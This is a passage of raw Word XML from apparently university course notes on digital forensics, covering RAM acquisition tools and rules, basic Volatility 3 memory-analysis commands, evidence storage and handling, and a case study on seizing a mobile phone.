          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">fileless malware</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Network connections and the remote IP addresses they connect to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Logged-in users, command-line history, clipboard contents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Passwords, encryption keys and decrypted versions of encrypted files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open documents and browser sessions, including private browsing traces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DLLs loaded and registry data in use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this all disappears when the computer shuts down, memory acquisition is the first step of any live-response investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools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FTK Imager</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 Capture Memory. Saves a RAM dump (.mem); can also include the pagefile. Used in your Practical 1.</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Belkasoft RAM Capturer</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Free, small tool that captures the physical memory of a running 32/64-bit Windows machine, even when anti-debugging protections exist.</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DumpIt, WinPmem, LiME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Other common tools for Windows (DumpIt, WinPmem) and Linux (LiME).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic rules for capturing memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">from an external, trusted USB drive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, not from the suspect’s disk, and save the dump to external storage with enough free space (about the same size as the RAM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a tool with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">smallest possible footprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the tool itself must be loaded into RAM and will overwrite a little data. Document this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note the exact time, who ran it, and the system’s uptime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record the file name, size and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the dump immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not shut down the system until the capture succeeds; capture memory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> taking a disk image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A first look with Volatility 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Volatility 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a free memory-forensics framework used to analyse RAM dumps. It uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plugins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Three basic ones used in your lab are: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Plugin</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292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windows.info</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Identifies the Windows version/build of the memory image — always the first step.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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windows.pslist</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the processes that were running, with process IDs (PID) and parent process IDs (PPID). Suspicious names or odd parent-child relationships are noted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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windows.netstat</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network connections: local and remote addresses, ports, state, and the owning process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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rPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f memdump.raw windows.info</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f memdump.raw windows.pslist</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vol -f memdump.raw windows.netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Memory analysis flow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rPr>
          <w:cantSplit/>
        </w:trPr>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Memory dump</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windows.info</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windows.pslist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windows.netstat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Correlate &amp; investigate</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Remember</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A suspicious process in memory is an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">indicator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> that needs more investigation, not automatic proof of malware. For example, a process called </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">svchost.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is normal; the same name running from a user’s Temp folder is not.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.12 Evidence Storage and Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">anti-static bags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for drives and circuit boards; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Faraday bags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or aeroplane mode plus shielding) for phones to block remote wiping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Seal with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tamper-evident tape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, label and photograph each item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">locked, access-controlled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> evidence room with an entry log — away from heat, moisture, dust and strong magnets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Transport in padded, sealed containers and keep the chain-of-custody form with the item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">master image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> untouched in secure, read-only storage and do all work on a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">working copy</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Store on reliable storage with backups (preferably RAID plus an offline copy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypt stored images and restrict access by role; log who accessed them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-verify hashes periodically and before each use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep evidence for the period required by the case, law or policy; dispose of it securely only when authorised, and record the disposal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Case study — Seizing a mobile phone</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A phone is found on a suspect’s desk, screen on, with a messaging app open. The first responder photographs the screen, places the phone in a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Faraday bag</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to stop remote wiping, and records the time. Keeping the phone powered with a portable charger prevents it from locking and re-encrypting. The phone is then taken to the lab with the chain-of-custody form, where a specialist acquires its data using a validated mobile forensic tool.</w:t>
            </w:r>
          </w:p>
